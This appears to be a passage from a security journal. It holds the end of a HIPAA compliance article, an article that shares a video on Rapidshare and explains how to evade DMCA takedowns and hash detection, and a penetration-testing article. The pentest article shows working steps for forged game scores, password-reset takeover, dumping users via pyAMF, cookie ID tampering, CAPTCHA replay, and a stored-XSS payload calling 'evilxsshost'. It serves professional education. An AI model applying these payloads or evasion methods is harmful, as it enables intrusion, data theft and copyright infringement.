Constantly changing healthcare laws and regulations pose a governance risk. Does your organization have a strategy to identify and monitor its exposure? If your organization does not have a thorough understanding of compliance requirements, it will not be able to efficiently leverage its security initiatives to tackle ongoing regulatory demands. Remember that security does not equal compliance. So be aware of the requirements, solicit feedback and interpretation from outside experts, and develop a protection framework to meet security standards as well as compliance requirements. As an organization handling PHI, you should also have a framework in place to keep abreast of the changes to applicable regulatory requirements.

Sustain compliance

Sustaining compliance requires identifying and remediating the IT infrastructure, governance, and communication problems on an ongoing basis. It requires enormous effort on the part of those charged with compliance, as well as coordination of the business processes and IT resources used to achieve compliance. Specifically, organizations must create a culture of compliance maintenance. This may require an organizational shift from a project mentality to a program mentality that will bring together the risk, governance, and compliance initiatives, helping to pave the way for a converged compliance management program.

In developing a compliance plan for data security, following an integrated framework that addresses security, privacy, risk, and compliance will result in a more manageable program that allows more efficient compliance efforts.

Information protection evaluation checklist

Here is a list of questions that can help get you started with building the health information protection framework around the key elements.

Strategy and Awareness

·      Have you developed a health information protection strategy that encompasses the key elements of HIPAA and the HITECH Act?

·      Have you performed a recent assessment to determine your compliance posture with the HIPAA Privacy/Security Rule?

·      Have you prepared security awareness programs to promote the education of Health Information Privacy and HITECH requirements within your organization?

Information Security and Privacy 

·      Have you reviewed and updated Notice of Privacy Practices to reflect changes in privacy and security policies?

·      Have you made updates to your security policies and program to reflect the changes in regulatory standards?

·      Have you evaluated the restrictions on the sale and marketing imposed by the HITECH Act?

Security Technology and Operations

·      Have you developed a detailed Breach Notification Policy that complies with HITECH and any state law counterpart to the new federal breach notification provisions?

·      Have you evaluated access management if using EHR (individual’s right to access) according to the HITECH guidance?

Risk Management

·      Have you expanded your Business Associate Inventory to include vendors and other related services?

·      Have you updated Business Associate Agreements to include expanded new requirements?

Conclusion

While data security requirements such as HIPAA and HITECH impose mandatory requirements, many health practitioners and organizations recognize that protecting healthcare information and ensuring consumer privacy is also just good business practice that leads to satisfied consumers. The increasing exchanges of health information bring new challenges in privacy and security as the industry becomes more and more interconnected. The security and privacy of patient data is a key element in creating a secure healthcare information infrastructure. The magnitude, complexity, and dynamic nature of developments affecting the exchange of health information demand a broad and flexible information protection strategy. This information protection strategy must encompass risk management and governance policies so that people, processes, and technologies can provide for the growing security and privacy requirements for proper treatment of health information.

About the Authors

Bindu Sundaresan, CISSP, CISM, CEH, is a senior information security professional with AT&T Consulting Solutions, Security Consulting Services. She has a B.S. in Electrical Engineering and an M.S. in Telecommunications. She has experience with providing compliance expertise including HIPAA, HITECH, SOX, PCI and FFIEC for a variety of Fortune 500 clients. She may be reached at bindu.sundaresan@att.com.

Carisa Brockman, CISSP, CISA, is a senior information security professional with AT&T Consulting Solutions, Security Consulting Services. She has a B.A. in History and has experience providing Fortune 500 clients across financial, healthcare, retail, and public sector industries compliance expertise relative to information security and privacy. She may be reached at carisa.brockman@att.com.

 

 

A Reality of Modern Filesharing

By Richard Abbott

 

This paper describes Rapidshare.com, which has become the undisputed king of one-click hosting. The author is going to show how to share files by actually doing so.

 

In the beginning there was Napster, and a bunch of kids started swapping mp3s. A tiny little band called Metallica then started the war, the war between the kids wanting to share files freely and the lawyers trying to maintain control over their client’s intellectual property. The resulting arms race has created a plethora of sharing technologies. A decade later the vast majority of filesharing today occurs via two distinct schemes: the bittorrent protocol and the one-click hosting services. This paper describes the later, specifically Rapidshare.com which has become the undisputed king of one-click hosting,[14] and I am going to show you how to share files by actually doing so.

File sharing cannot be ignored. There are three scenarios where even the most pro-copyright/anti-sharing technology professional requires an understanding of filesharing technology:

1.     Nearly every corporate network has some sort of anti-filesharing policy. Network administrators must therefore keep abreast of the technology if they hope to enforce these policies.

2.     Every organization owns some sort of intellectual property and may one day discover this property being improperly distributed via filesharing. The organization’s in-house technology team will be the first experts consulted. They should be able to quickly identifying whether such sharing is actually occurring and offer practical advice on how to deal with the situation.

3.     Filesharing is an area of rapid development in the areas of privacy, practical encryption, and overall security. Filesharing tools can be put many legitimate uses to reduce costs or solve distribution headaches.

No matter what your opinion of how the technology is used, everyone should keep up to speed.

Hosting Service are not peer-to-peer networks 

A peer-to-peer (p2p) network exists as a web of interconnected computers (peers) run by persons wanting to share files with others running similar software. These networks function efficiently only where many connected users share identical copies of a particular file. This allows swarm downloading[15] whereby a peer downloads a file simultaneously from multiple peers. The downloading of rare, unique, or simply unpopular files is difficult and places heavy bandwidth requirements on those who do choose to share. Because files within p2p networks are stored only on user machines, when a user is offline, the files he or she was sharing are also offline. Where only one user is sharing a particular file, that file is only available so long as that user remains online. Lastly, p2p leaves participants open to observation by copyright investigators.

File hosting services function very differently. Hosting services allow users to upload files to a cloud of servers scattered amongst multiple data centers. Each file is assigned a unique URL that is provided to the original uploader. Thereafter this link can be used to download the file. There are no direct file transfers between sharers. Sharers instead trade the URL links to their uploaded files. This structure has huge advantages over p2p networking. Download speeds are no longer limited by the speed of the uploader’s internet connection. Popularity of files is irrelevant as all files remain online and can be simultaneously downloaded by hundreds. Most importantly, uploaders need no longer remain connected in order to share. These improvements mean that one-click hosting is exponentially more powerful sharing tool.

To learn, one must do

Lectures might work well for law schools, but technology requires real-world participation. In this article I am going to show you how to share files by actually doing so. I am going to take a large file (300mb) and share it via a the hosting service Rapidshare. Anyone reading this article will be able to download and view the video easily. The file is called “A_Wolverine_Goes_Fishing.mpeg.”[16] If discovered, this video could be subject to takedown order under the Digital Millennium Copyright Act (DMCA). To avoid takedown, I am going to take steps to hide the file from copyright investigators while still freely publicizing its location to filesharers, and those reading this article. Feel free to download and reassemble this file from any of the available links.

Step one: Prepping the file 

At three hundred megabytes (300mb) the file is too big. Rapidshare has a 200mb per file limit if the file is to be made available to non-subscribers.[17] To get around this I am going to cut the file into two 150mb pieces. For reasons I will explain later I am also going to encrypt the file. In the file sharing community the rar file format is used for both these tasks. I am using a Linux tool (Figure 1) but Windows users can perform the same tasks via WinRAR. Mac users ... I don’t know much about Macs, but I am sure there is a tool out there somewhere.

Figure 1 –  Splitting and encrypting the file to be transferred.

I now have two 150mb files. Together they are encrypted with the keyword “Rabbits,” which downloaders will need when reassembling the file. It is not unusual to see Blu-ray movies cut into hundreds of individual rar files, but such packages can take days to prepare and upload.

Step two: Uploading the files 

I have chosen to share my files via Rapidshare.com. There are others services that are arguably better/faster/cheaper, but Rapidshare is currently top dog. The upload process is simple. From the rapidshare website I click the upload button and select the files I want to share. Rapidshare then assigns each file a unique link, which can then be used to download the files (Figure 2).

These are the links assigned to my files by Rapidshare:

http://rapidshare.com/files/268545102/A_Wolverine_Goes_Fishing.mpeg.part1.rar

http://rapidshare.com/files/268556496/A_Wolverine_Goes_Fishing.mpeg.part2.rar

Figure 2 – Uploading files

Step three: Publishing the links 

There are many websites dedicated to link swapping. Most of these are run on small budgets and are supported by a combination of advertising or donations. Most take the form of discussion forums where uploaders can publish their links and receive comments from downloaders. As file hosting services do not allow users to search or browse files directly, these sites provide the needed communications link between uploaders and downloaders. Some of these sites are invitation-only affairs, while others are open to the public. I am not going draw unwanted attention to the site I used for this exercise, but it was not very hard to find.

Notice that my posted links are not those assigned by Rapidshare (Figure 3). This is a ploy by me to avoid the robot armies of the copyright police.

If I had posted the actual Rapidshare links, they would be have been discovered too easily. Every few days this website is visited by Google’s spider that indexes any new posts. After such a visit, any investigator googling “rapidshare wolverine” would find my links and have my files removed via a DMCA takedown notice. Some websites try to limit this indexing via a robots.txt file, but many spiders do not respect such requests. Some advanced spiders will actually download my files from Rapidshare and compare them to a list of target files. Copyright investigators rely on these automated systems and rarely inspect websites in person. My goal as an uploader is to make those investigators work for their supper by hiding my post from automated detection. This increases the life expectancy of my files by reducing the chance that they will be discovered by lazy copyright investigators.

Accepting that my post would be visible to spiders, I had to remove the keywords ‘rapidshare’ and ‘wolverine’ within my links. There are a great many ways to protect links from discovery. By far the simplest method is via the use of a URL redirection service. Sometimes improperly described as URL shorteners, these services redirect browsers from one URL to another. They are not proxies in that they do not handle traffic. They simply respond to one URL with another. If you use Twitter then you are probably familiar with Bit.ly or TinyURL, but in this case I used a service called Lix.in. I submitted my Rapidshare links to Lix.in and was provided unique Lix.in links. These new links do not contain the keywords Rapidshare or wolverine and can therefore be indexed by spiders without worry.

There are other advantages to URL redirection. Some determined spiders will actually follow redirected links to discover the true links they mask. Lix.in allows me to insist on an image-recognition (captcha) test prior to divulging my actual Rapidshare link (Figure 4). Spiders cannot read captchas, so they will not be provided with my true links. With their automated tools stymied, only the most determined investigator will discover my links.

If my links were detected, the next step for any investigator would be to google the text of those links to discover where else on the internet they have been posted. If I were to post identical links on multiple websites the investigator would be able to follow my path across the filesharing community and perhaps discover sharing communities that would otherwise have gone unnoticed. Lix.in provides yet another frustration.

By submitting a Rapidshare link multiple times I can use Lix.in to generate multiple unique links. I can then post unique Lix.in links in multiple locations without worry that an investigator will be able to follow my tracks. I meant it when I said that I wanted investigators to work for their supper.

Step four: Walking away 

Now that the files are uploaded and the links published, I walk away. Unlike file sharing via p2p networks there is no need for me to remain online. The files now live on Rapidshare’s servers. They can be downloaded by anyone at any time and at whatever speed his home connection will allow.

That’s it. That’s how large files are shared. Please feel free to download them via the Rapidshare links. Click the “free user” option. Once you have both files you can reassemble them via WinRAR. The encryption key is always “Rabbits.”

Avoiding Rapidshare’s internal Security 

Rapidshare maintains a growing database of MD5 hashes taken from files that have been reported as copyright violations. Any file matching a hash in that database is automatically removed (Figure 5).[18] In theory this combats illegal filesharing by preventing users from repeatedly uploading illegal content. In reality this is only a minor inconvenience as the system can only target files with a matching hash. I did not upload an actual movie file. I uploaded an encrypted archive containing a movie file. Any alteration to the archiving/encryption process would radically alter the hash values of the resulting files and render them invisible to hash-based detection measures.

These are my files and their MD5 hash values:

A_Wolverine_Goes_Fishing.mpeg         300 MB   c80f4a6b2b37dddce36e9bc436b07a65

A_Wolverine_Goes_Fishing.mpeg.part1.rar 150.5 MB      fb81fd894abd17efdf1a6cae08ea1564

A_Wolverine_Goes_Fishing.mpeg.part2.rar 150.3 MB      9af068ec20f86473a2bec9ad1e37a29e

If I were to change the rar encryption key to “Rabbits2” the result would be:

A_Wolverine_Goes_Fishing.mpeg         300 MB   c80f4a6b2b37dddce36e9bc436b07a65

A_Wolverine_Goes_Fishing.mpeg.part1.rar 150.5 MB      ebec7768835b3417567057a49befc326

A_Wolverine_Goes_Fishing.mpeg.part2.rar 150.3 MB      9eb0d898ee6e3c280301279b850a5a19

Same file names, identical sizes, but the rar files now have radically different hash values. There is talk of file hosting services taking steps to look inside rar archives. File encryption renders such inspections impossible, and so is disallowed by services such as MediaFire.[19] Even if automated systems were deployed to open archives, there is no reason to expect that the files contained within would have stable hashes. Even an imperceptible alteration to a media file will change its hash. It would only take a slight tweak of the resolution, codec, length, or even metadata to again render the file invisible to automated detection. Automated removal systems may placate lawyers who demand that file hosts remove every instance of a particular file within their systems, but their impact on improper sharing is little more than an annoyance.

One-click filesharing on your network

Companies who permit employees to access the Internet universally adopt an anti-filesharing policy. When it comes time to enforce such a policy, and perhaps discipline an employee for violating it, one must have both a clear definition of filesharing and an objective test for whether it has actually occurred.

Network administrators often confuse the mere browsing of websites that discuss filesharing with the sharing itself. In the case of Rapidshare and similar services, the actual uploading and downloading of shared files only ever occur between the participant and Rapidshare’s servers. An employee caught browsing a website where links are traded has not actually engaged in filesharing per se. Similarly an employee accessing Rapidshare might do so for non-sharing purposes such as the backing up of personal files, or sharing material not subject to copyright limitations such as open source software. The touchstone should be large amounts of traffic to or from Rapidshare’s servers for which the employee cannot provide a reasonable explanation.

Anti-filesharing policies are based on a fear of liability, a fear that the employer may be sued for copyright violations occurring via its network. In the case of peer-to-peer sharing that fear is justified, but for Rapidshare the risk is more complex. One-click hosting services generally do not maintain download records. Many consider doing so an invasion of their customers’ privacy, a form of wiretapping. Rapidshare has made a singular point of asserting that it does not maintain such records.[20] Rapidshare only maintains records of uploads. So the liability risk where an employee has only downloaded material is minuscule. This may be splitting hairs, but with an employee’s job on the line all decision makers must have a clear picture of the situation.

Dealing with the discovery that your material is being shared

File sharing is very difficult to stop. The knee-jerk reaction is to summon the lawyers and declare war on the Internet. That costs money and does little to stop the sharing. Before doing anything else, spend ten minutes answering these two questions:

What type of sharing is this?

There are countless methods for sharing files, but the big two are one-click hosting and bittorrent. The touchstone is the type of file you are invited to download. If it is an executable file (*.exe, *.bat, etc.) you are almost certainly dealing with a scam. Files shared through one-click services will be in whatever format they were uploaded but are normally compressed into archive formats (*.rar, *.7z) split into multiple files (*.001, *.002) or both (*.rar.001, *.part1.rar). You may also run into download container files (*.rsdf, *.ccf and *.dlc). These files contain links to one-click hosting, but require additional software to access them. If the filename ends with *.torrent, then you are dealing with sharing via bittorrent.

Is this real?

There are a great many scams out there trying to sell access to filesharing services. Until you actually download and inspect the files, you cannot be sure that you are not dealing with a scam. The standard scam involves a search engine that will always return positive results. NowDownloadAll.com is a good example (Figure 6). Apparently, thousands of people have downloaded one of my files via their service and I can too for a small membership fee.

Actual filesharing services never demand money from new users. They all have “free user” options. If a website asks you for money or personal information prior to download, you are dealing with a scam.

Scams may seem trivial, but I have seen lawyers pull out all the stops under the false belief that their client’s material was being sold via these websites. Recognizing the scam before the lawyers get involved saves time and money. Being able to demonstrate to your boss that your company’s material is not actually being shared saves blood pressure.

Calculating a response

Once you are confident that sharing is occurring, the big question will be whether you want to respond yourself or farm the work out to a copyright enforcement company. There are many companies out there offering their services “for free.” Be extremely careful when dealing with these. Whether or not they are appropriate will turn on the type of sharing you are looking to combat.

Most copyright enforcement companies base their business models on commissions. They send cease and desist letters to filesharers along with offers to settle for a fee, usually in the hundreds of dollars. The company takes a commission ranging from thirty to sixty percent and forwards the balance to the copyright holder. While this is a profitable business model when deployed against peer-to-peer sharing, it is not effective against one-click hosting. Peer-to-peer sharing involves a large number of uploaders (seeders) that announce themselves to the world via their IP addresses. This creates a target-rich environment for cease and desist mailings. One-click hosting is altogether different. The IP addresses of those involved cannot be discovered directly. They are only knowable by the hosting services which are not going to turn over customer information absent a court order. Fighting one-click sharing will therefore never be a profitable business. Any offer to do so on commission must be treated with suspicion.

While direct profits are not on the table, cost-effective countermeasures do exist. Hosting services are still obligated to respond to DMCA takedown requests. By consistently monitoring the links-swapping community, one can discover and report offending links quickly, thereby frustrating uploaders. My demonstration earlier should give you an idea of what this entails. Many links-swapping websites are acutely aware of their role in filesharing. Many will respond to requests for links to be removed. Most maintain blacklists of “forbidden content,” the sharing of which is disallowed. Posts containing links to such material will be actively removed and the relevant posters sanctioned. A few polite emails to those administering the more popular websites will do more in ten minutes than a year’s worth of lawsuits.

The effectiveness of these tactics cannot be measured directly and therefore is best kept in-house. It is nearly impossible to measure exactly how many times a file has been downloaded. Conversely it is impossible to measure how many downloads are prevented through the removal of a file. A successful campaign is one that removes links so quickly that the uploaders grow frustrated and discontinue, resulting in fewer active links. Therefore the successful campaign will over time discover fewer links and have fewer results to report. This paradox makes performance very difficult to measure. Only through close in-house supervision can one be sure that the campaign remains cost effective.

Legitimate one-click filesharing

While at law school I was once asked to distribute a large video file (400mb) to fifty different people. We have all been there. A big file and an email list of recipients who do not know an IP address from a postal code. It was suggested that I “just burn some CDs.” That wasn’t going to happen. The standard geek response to this problem is to setup a file server, but that is always a headache. When you need to share a file with a large group of people, then you need filesharing tools and the one-click hosts are the answer. Upload the file once and distribute the links via email. Each can then download the file at his own pace, no servers or special software required.

In a business environment few downloaders want to view ads or deal with suspicious “free user” options on filesharing website sites. Rapidshare’s Trafficshare program addresses these concerns. Anyone following a rapidshare link to a file assigned to Trafficshare will download it from Rapidshare’s servers without having to click on anything. The bandwidth costs are covered by the uploader at 4¢ per gigabyte. This is much like basic hosting but lacks the headaches of maintaining a server. I use Trafficshare on a daily basis to transfer files where the recipient cannot handle large email attachments. It is cheap, convenient, and is a perfectly legitimate use of filesharing technology.

This is only a snapshot

The one-click hosting community is constantly changing. The various services involved are constantly introducing or retracting rewards programs, security measures, and new subscription models. Sometimes these changes are market-based, but are often made in response to perceived legal threats. On June 25th Rapidshare was in the process of revamping both its subscription plans and rewards programs.[21] Some are predicting that this will topple Rapidshare in favor of other services. While the specifics will constantly change, the basic structures behind one-click hosting will remain.

Links

—Trafficshare link to an image used in a previous version of this article - http://rapidshare.com/files/292603917/HostingDiagram_600.tif.html.

—Rapidshare links for “A_Wolverine_Goes_Fishing.mpeg” – http://rapidshare.com/files/268545102/A_Wolverine_Goes_Fishing.mpeg.part1.rar, http://rapidshare.com/files/268556496/A_Wolverine_Goes_Fishing.mpeg.part2.rar.

—Lix.in links for same – http://lix.in/-8871c1, http://lix.in/-7dc36.

—Comparison of one-click hosting services – http://en.wikipedia.org/wiki/Comparison_of_file_hosting_services.

This article has been adapted from “The Reality of Modern File Sharing,” The Journal of Internet Law, Volume 13 Number 5 (Nov ‘09).

About the Author

Although a member of the Bar in Oregon, Richard Abbott works as a privacy consultant out of Vancouver, British Columbia, Canada. Richard is active in both the Science and Technology and Intellectual Property sections of the ABA where he is an advocate of open source software and open security standards. Richard can be contacted via Oregonrabbit@hushmail.com.

 

 

 

Application Penetration Testing Versus Vulnerability Scanning

By Bil Bragg

 

This article demonstrates realworld examples of the different types of flaws found only through manual testing.

 

Abstract

Running a web application scanning tool against a website can find serious vulnerabilities. A more in-depth look through web-application penetration testing can reveal further interesting and exploitable vulnerabilities. This article demonstrates some real-world examples of the different types of flaws found only through manual testing.

 

Web application vulnerability scanners are good at finding certain kinds of vulnerabilities, such as SQL injection and cross-site scripting (XSS). Even then, they need to be configured correctly. One area that is often not scanned is the logged-in areas of websites. Manual web-application penetration testing can find trickier SQL injection and cross-site scripting issues, as well as logical issues. Examples of logical flaws would be unused but exploitable functions in a Flash file, or a password reset function that allows you to reset any user’s password.

This article will take you through several examples of vulnerabilities that were all discovered after vulnerability scanning had taken place. All the examples are from websites of a global retail company, which uses third-party design agencies to develop their brand websites. These websites often feature competitions, and all require user registration of personal details, usernames, and passwords. It was important to the company that personal data was protected, that competitions could not be abused, and that their reputation would not be tarnished by adverse publicity due to published flaws. The company ran their own web-application vulnerability scans, and then web-application penetration tests were performed.

Some free tools are used in this article, including the Web Developer and Tamper Data Firefox add-ons, the Fiddler2 web proxy, and the HP Flash decompiler SWF Scan. These are all listed at the end with links. Please note there are many tools that can be used to accomplish the same tasks.

Submit any high score

One of the websites had a Flash game, based on one of the company’s products. Visitors could play the game and post high scores. An inherent problem with Flash games is that they run on the client, and so information such as game scores will be sent from the client PC. Anything sent from the Flash client to the web server should be considered as untrusted and open to abuse.

The Flash game on this website posted XML text to a web service with the link (http://localhost/highscores.asmx). The web request by the Flash client can be seen by using a local web proxy such as Fiddler2, which will log all browser requests and server responses:

<soap12:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:soap12=”http://www.w3.org/2003/05/soap-envelope”>

<soap12:Body>

<ScoreEnter xmlns=”http://tempuri.org/”>

<gameID>1</gameID>

<username>test</username>

<score>260</score>

<scoreCheck>8afcadbb42ba16254036ff823c5ee5
8e</scoreCheck>

</ScoreEnter>

</soap12:Body>

</soap12:Envelope>

Trying to post arbitrary high scores by just changing the score field (using Tamper Data) resulted in the web service returning an error. Tamper Data will pop up a window when you click submit, which allows you to change any of the information before you actually allow the data to be sent to the web server. As you can see, the web request contained a scoreCheck code. This code was used by the web server to verify that the score submitted was legitimate. When a tampered score is submitted, the server calculates its own hash, but it does not match the scoreCheck code so does not allow the score. The Flash game file, game.swf, was decompiled using SWF Scan (one of several tools that can do this). One of the Flash functions in the ActionScript code revealed how the scoreCheck was created:

private function getScoreCheck(arg0:String, arg1:Number) : String

{return MD5.encrypt(arg1.toString() + arg0);}

This shows that the scoreCheck value is the MD5 hash of the score combined with the username. The decompiler does not know the original names of the function arguments, so has to number them, i.e. arg0, arg1 and so on. That arg0 is the username and arg1 is the score can be inferred by the calling code and a little guesswork. This knowledge was used to submit an excessive high score and a valid scoreCheck hash (the MD5 of “1000000rudeword”), by simply amending the request from the browser at the end of a game, again using Tamper Data:

<username>rudeword</username>

<score>1000000</score>

<scoreCheck>d439312e55dc6f5c07cfc828d0c55d71</scoreCheck>

The impact of this issue would have been to the reputation of the organization and the product brand. The highest scorer would also have been given a prize.

There are many Flash applications on the web that are open to this kind of abuse, as Flash runs on the client-side. Many Flash applications use XML, AMF, or plain text to communicate with server-side pages. A scanner would not be able to logically determine that a field is a hash check. To find these, you need to view the conversations with a proxy such as Fiddler2, Burp, or a browser plug-in such as Tamper Data. The conversations, such as the first one above, can show which fields may be open to abuse.

Reset anyone’s password

Some of the websites share a user registration database between them, which has tens of thousands of personal details. The particular website being tested had the usual registration process where the user registers and chooses a username and password, and also enters an email address and postal address.

The website also had a password reset process, where a user can enter his email address on the ResetPassword.aspx page. The user is then sent an email which contains a link with a “k” parameter in it:

http://localhost/ResetPassword.aspx?k=7f092619-f9ad-4a3f-adce-de6f05b4f679

Clicking on this link showed the ResetPassword.aspx page, now with username and password fields (see Figure 1). The website expected you to enter your own username and new password. However, you could enter any username, and reset the password for that user. The “k” parameter did not seem to be used to validate the user. The page also helpfully lets you know if the username was valid, by showing the message: “no account found with that username.”

The impact of this was that someone could set the passwords for thousands of users, given that it is likely that the usernames could be found using a dictionary attack. These user details could then be accessed and targeted for spamming or identity theft.

Although this specific example is rare, links and actions that require manual user interaction to be exposed are common. Issues with password management on websites around forgotten passwords are also common. A scanner would need to be supplied with the link in the email initially, but then would not be able to identify this logical vulnerability. The tester can manually discover links and actions by ensuring that all inputs are identified, including those in messages and emails sent from an application. You would then need to check fields that the system has generated and may therefore trust erroneously, such as the username field in this example.

Unused hidden web services

One website allowed visitors to register and upload pictures through a Flash client. The Flash client communicated with the web server using Adobe AMF (Action Message Format) through a gateway ASP.NET page (http://localhost/amf/gateway.aspx).

The decompiled main.swf Flash client (using SWF Scan) showed the web services used in an interface declaration. Some of these functions are shown below, some with very interesting names. These types of functions can be found by looking for the gateway.aspx link above, and searching for which web service calls are made using this, and then the functions that make these service calls.

public interface IWebsiteSixService

{

function IWebsiteSixService();

function isAuthenticated(arg0:Function,

arg1:Function);

function authenticateUser(arg0:String,

arg1:String, arg2:Function, arg3:Function);

function validateUser(arg0:String,

arg1:Function, arg2:Function);

function listAllUsers(arg0:Function,

arg1:Function);

function listAllImages(arg0:Function,

arg1:Function);

function registerUser(arg0:String,

arg1:String, arg2:String, arg3:String,

arg4:String, arg5:Boolean, arg6:Boolean,

arg7:Function, arg8:Function);

function listFeaturedImages(arg0:Function,

arg1:Function);

... }

Not all of these functions were used by the client, most notably the function listAllUsers. This function was tested outside of the Flash client by using a handy Python module, pyAMF. The gateway ASP.NET page was specified along with the ListAllUsers service called by the function, resulting in three lines of Python code:

from pyamf.remoting.client import RemotingService

gateway = RemotingService(‘http://localhost/amf/gateway.aspx’)

print gateway.getService(‘WebsiteSixService.ListAllUsers’)()

This returned a list with details of all the registered users, including names, postcode, email address, password hash, and password salt. The impact of this was that all personal details in the registration database are exposed. The attacker can try and brute force the passwords, but even without them, the attacker has an excellent opportunity for social engineering with the personal details and with the knowledge that those people have registered on this website.

A Flash client that communicates with the web server sometimes uses an interface that may be shared with other system components. This interface may expose administration-only methods, such as those listed above. Although a good scanner may find links in Flash code, a scanner would not currently determine custom web service method calls. Finding and checking these requires a tester to decompile the Flash client and look for web service calls in the code. SWF Scan is excellent for that.

Stored cross-site scripting

Many websites have an administration backend available on the public website, commonly at /admin. One of the company’s websites had an administration backend that could be found using a directory guessing tool. A great tool for this is DirBuster. This particular website’s administration backend was in the directory /SiteAdmin. The user registrations could be listed here. An administrator that logs in to the administration area and clicks on a particular registration was shown the registration details, including the registered user’s web browser details. These browser details are supplied to the web server by the browser in the User-Agent header. Why the administrator needed to see the registered user’s web browser details in this case was not clear, but this header and other headers such as the referrer is occasionally shown. Here’s an example, which can be shown by using the Live HTTP Headers add-on for Firefox.

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)

The User-Agent in the browser web request can be changed by using a tool such as the Tamper Data Firefox add-on. Adding a bit of JavaScript to the User-Agent, highlighted below, can determine what impact this may have on the website. In this case, the script was executed when an administrator looked at that user’s registration details, which include the User-Agent of the registered user. An administrator may look at a registered user’s details to verify if it is a legitimate account, or can be prompted to view the details by sending an email saying that there is a problem with the account. Either way, the attacker needs to wait for the administrator to look at that account’s details. This was therefore found to be vulnerable to cross-site scripting. The other registration fields had validation and encoding in place to prevent cross-site scripting, so only this field was vulnerable. The modified User-Agent is as follows.

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)<script src=’http://evilxsshost/js’></script>

The impact of this was that someone could have gotten access to the administration area, and so be able to steal personal information and deface the website. The XSS Shell tool can demonstrate how this can be done: the script link in the User-Agent field would be the link to the attacker’s XSS Shell’s script. When the victim viewed the registration details page, his details would appear on the attacker’s screen. The attacker can then make himself an administrator by plugging the victim’s session cookie into his own browser, for example by using the Web Developer add-on for Firefox.

A web application scanning tool may have found this issue; however, frequently tools are not configured correctly. In this case, the tool would have needed to be configured with authentication for the administration area. This example of stored cross-site scripting in the administration area is a common issue that is missed by scanners. This issue can be found manually by browsing the administration area and seeing what kind of information is presented. Inject script in the areas such as the registration or comment areas; then check to see if it executes when the administrator views it.

User ID in a cookie

One website had a simple registration page for a newsletter. After registration, you could log in and amend your personal details and newsletter preferences. Unusual cookies are always worth a look, where “unusual” means that they are not the usual application framework session cookies. When you logged into this website, the system set an unusual cookie as well as a usual ASP session cookie (viewed by looking at traffic in Fidder2):

Cookie: ASPSESSIONIDCSTSRBBS = JACLEBJACANIJJABODECJMGE; usession = dWlkOjE3N jg0MTtmbmFtZTp0ZXN0O3NuYW1lOnRlc3Q7ZW1haWw6d GVzdEBzb21lZG9tYWlu

The usession cookie was a base 64 encoded string. Base 64 encoded strings can be recognized by the character set that they use. The usession cookie revealed the following fields when decoded (using the encoder in Fiddler2):

uid:176841;fname:test;sname:test;email:test@somedomain

The uid field looked interesting, as it appeared to represent the logged in user’s ID. This was changed to a different value close to the old ID, say 176840 or 176839, and then the whole string was re-encoded to base 64. This new usession cookie was then updated in the browser (by using a tool such as the Firefox Web Developer add-on), and the personal details page refreshed. This presented the personal details of another user. The impact of this was to expose the entire registration database, as an attacker could cycle though sequential uid values.

An identifier in a cookie that can be abused appears occasionally in websites that we test. The example here is encoded and is part of a cookie with other fields. A scanner would not identify this particular vulnerability due to the encoding and field layout. To find this manually, you would need to notice this as a custom cookie that is base 64 encoded. When you decode it, you need to try and see what happens when you change different parts of the cookie, especially any that look suspiciously like a user identifier!

Bypass CAPTCHA

Many of the organization’s websites use CAPTCHA images to hinder automated attacks. These attacks include password guessing, multiple registrations, and automated prize-code checking. CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) images can be weak themselves, and be vulnerable to OCR techniques. There can also be simpler vulnerabilities to exploit with CAPTCHA, as this example demonstrates.

One website relied on the same CAPTCHA function for the user registration process and for the prize-code check. A user needed to register or log in and then enter a prize code, which could be found on the company’s product label. A winning code resulted in the user receiving one of a number of prizes. The number of prize codes a user could enter per day was also limited.

The website used a Flash client to communicate with a web service. The following XML (viewed using Fiddler2) shows how the Flash client passed the prize code to the web service:

https://localhost/WebServices/CheckPrizeCode.asmx

<soap12:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:soap12=”http://schemas.xmlsoap.org/soap/envelope/”>

<soap12:Body>

<CheckPrizeCode xmlns=”http://tempuri.org/”>

<CaptchaHash>7FLFwNtuq6UgIdE1awgUrQ==</

CaptchaHash>

<CaptchaText>K46TPJ</CaptchaText>

<PrizeCode>H1N181430B1G</PrizeCode>

<IPAddress>127.0.0.1</IPAddress>

</CheckPrizeCode>

</soap12:Body>

</soap12:Envelope>

The CaptchaHash and the CaptchaText could be reused in multiple submissions of different PrizeCode values. Retrying CAPTCHAs is a normal step in a penetration test. However the CaptchaHash parameter stands out as potentially being vulnerable: if the server is only checking the CaptchaHash against the CaptchaText, what is preventing replay? This made the use of CAPTCHA redundant, as once one set of CaptchaHash and CaptchaText was found, an attacker could then use these to try a huge number of prize codes.

The impact was that someone wishing to abuse the competition could automate the creation of multiple registrations and use those to automate multiple prize-code checks. In practice the likelihood of this succeeding in order to win prizes was fairly low, due to the size of the prize code key space; this may still, however, have resulted in adverse publicity. This could also have prevented someone from claiming a prize legitimately if the prize code was already claimed.

Many websites that use CAPTCHA that we have tested have problems with the implementation which renders the CAPTCHA ineffective. A scanner will have problems with CAPTCHA, as by their nature they are designed to prevent automated attacks. A tester should examine the communication between the browser and server to see how the CAPTCHA works. This will provide avenues on how to attack it.

Summary

Manual web-application penetration testing is certainly not the panacea for securing applications; however, it can certainly find serious security issues that a web-application scanning tool will miss. These vulnerabilities will primarily be logical vulnerabilities as opposed to technical vulnerabilities; however, technical vulnerabilities are also often not found by scanning tools, especially certain blind SQL injection and stored cross-site scripting issues.

With functional testing, scanning tools are used alongside manual testing to help make the process more efficient. As with any tool, application vulnerability scanning tools do need proper configuration and an awareness of security issues to ensure good website code coverage and discovery of issues.

Although many organizations do have security testing in their software development project process, many still treat this as an afterthought, or even wait until the site has gone live before security testing. Having security testing built into the project plan, with a contingency to fix any vulnerabilities discovered, will greatly improve the chance of the website going live on the planned launch date.

If serious security flaws are picked up by scanners or penetration testing, this indicates that the application design and development process can be improved. If you find scanners or penetration tests are picking up flaws on a regular basis, you would certainly benefit from requiring that in-house developers or third-party software companies follow secure development practices, such as the OWASP Development Guide.

References

